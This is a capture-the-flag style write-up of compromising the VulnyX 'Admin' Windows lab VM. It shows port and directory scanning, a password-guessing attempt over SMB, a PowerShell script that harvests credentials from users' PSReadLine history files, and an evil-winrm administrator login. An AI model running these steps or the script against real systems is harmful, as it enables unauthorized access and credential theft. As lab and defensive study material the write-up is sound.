┌──(root㉿kali)-[~/Desktop/vulnyx/Admin]
└─# nmap -sCV 192.168.56.20
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-22 23:28 EST
Nmap scan report for 192.168.56.20
Host is up (0.00076s latency).
Not shown: 996 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: IIS Windows
|_http-server-header: Microsoft-IIS/10.0
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
MAC Address: 08:00:27:5E:A6:CF (Oracle VirtualBox virtual NIC)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
|_nbstat: NetBIOS name: ADMIN, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:5e:a6:cf (Oracle VirtualBox virtual NIC)
|_clock-skew: 6h59m58s
| smb2-time:
| date: 2024-12-23T11:28:57
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.13 seconds
┌──(root㉿kali)-[~/Desktop/vulnyx/Admin]
└─# gobuster dir -u http://192.168.56.20/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt,zip
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.20/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: php,html,txt,zip
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/tasks.txt (Status: 200) [Size: 98]
/Tasks.txt (Status: 200) [Size: 98]
┌──(root㉿kali)-[~/Desktop/vulnyx/Admin]
└─# curl http://192.168.56.20/tasks.txt
Pending tasks:
- Finish website
- Update OS
- Drink coffee
- Rest
- Change password
By hope
This gives us a username: hope.
┌──(root㉿kali)-[~/Desktop/vulnyx/Admin]
└─# smbmap -H 192.168.56.20 -u guest -p ' '
________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator v1.10.5 | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap
[\] Checking for open ports... [*] Detected 1 hosts serving SMB
[|] Initializing hosts... [/] Authenticating... [-] Authenticating... [\] Authenticating... [*] Established 1 SMB connections(s) and 0 authenticated session(s)
[|] Closing connections.. [/] Closing connections.. [-] Closing connections.. [*] Closed 1 connections
So guest access is not available (one SMB connection, zero authenticated sessions).
Since we now have a username, we can try to brute-force its password. Keep the number of attempts below the lockout threshold: a locked-out account answers STATUS_ACCOUNT_LOCKED_OUT even when the password is right, which tells us nothing and blocks the account.
┌──(root㉿kali)-[~/Desktop/vulnyx/Admin]
└─# crackmapexec smb 192.168.56.20 -u 'hope' -p 'loser'
SMB 192.168.56.20 445 ADMIN [*] Windows 10 / Server 2019 Build 19041 x64 (name:ADMIN) (domain:ADMIN) (signing:False) (SMBv1:False)
SMB 192.168.56.20 445 ADMIN [-] ADMIN\hope:loser STATUS_ACCOUNT_LOCKED_OUT
Normally the brute-force here recovers the password for the user hope as loser,
but my VM may have a problem: I cannot log in with this password. I also tried brute-forcing other passwords, but got nothing.
Since my hope user cannot log in, I could not complete this part and went straight to the walkthrough:
https://d4t4s3c.medium.com/vulnyx-admin-walkthrough-66fc5891bec0
After getting in over WinRM as hope, running winPEAS flags the administrator's PowerShell console history (PSReadLine's ConsoleHost_history.txt),
which contains the administrator's account and password.
With those credentials, connect again over WinRM as administrator.
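The winPEAS finding above can be reproduced by hand. The following is an added example, not code from the original writeup or from winPEAS: it walks every profile under C:\Users, opens the PSReadLine console history at its default location, and prints the lines that look like they carry credentials. Run it inside the evil-winrm shell (or any PowerShell session) on the target. The list of credential-bearing command fragments in $credPattern is an assumption to be tuned per engagement; the history path is PSReadLine's default.

```powershell
# Added example, not code from the original writeup or from winPEAS: find the
# PSReadLine console history of every local profile and flag lines that look
# like they contain a secret.

# Default PSReadLine history location, relative to a user's profile directory.
$historyRel = 'AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt'

# Assumed list of command fragments that usually carry a secret on the command
# line (password flags, secure-string conversion, account management, runas).
$credPattern = '(?i)(password|passwd|pwd|-p\s|/pass:|ConvertTo-SecureString|AsPlainText|net\s+user|Set-ADAccountPassword|cmdkey|runas|-Credential)'

function Get-PSHistoryCandidates {
    param([string]$UsersRoot = (Join-Path $env:SystemDrive 'Users'))

    foreach ($userDir in Get-ChildItem -Path $UsersRoot -Directory -ErrorAction SilentlyContinue) {
        $file = Join-Path $userDir.FullName $historyRel
        # No file: that user never ran an interactive PSReadLine console, or the
        # profile ACL blocks us (reading another user's profile normally needs
        # local admin unless permissions are loose).
        if (-not (Test-Path -LiteralPath $file)) { continue }

        $lineNo = 0
        foreach ($line in Get-Content -LiteralPath $file -ErrorAction SilentlyContinue) {
            $lineNo++
            if ($line -match $credPattern) {
                [pscustomobject]@{
                    User = $userDir.Name
                    Line = $lineNo
                    Text = $line.Trim()
                    File = $file
                }
            }
        }
    }
}

# Where the current session would save its own history. Clear-History only
# empties the in-memory session list; this file keeps growing until it is
# deleted. Remote WinRM sessions usually do not load PSReadLine, so the cmdlet
# may be absent there.
if (Get-Command Get-PSReadLineOption -ErrorAction SilentlyContinue) {
    "Current session history file: $((Get-PSReadLineOption).HistorySavePath)"
}

Get-PSHistoryCandidates | Format-Table -AutoSize -Wrap
```

On the defensive side this is also the check to run after an admin has typed a password on the command line: the history file survives Clear-History and is only removed by deleting it, so a credential typed once into an interactive console stays readable to anyone who can read that profile.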
┌──(root㉿kali)-[~/Desktop/vulnyx/Admin]
└─# evil-winrm -i 192.168.56.20 -u administrator -p SuperAdministrator123
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\administrator\Documents> whoami
admin\administrator
*Evil-WinRM* PS C:\Users\administrator\Documents>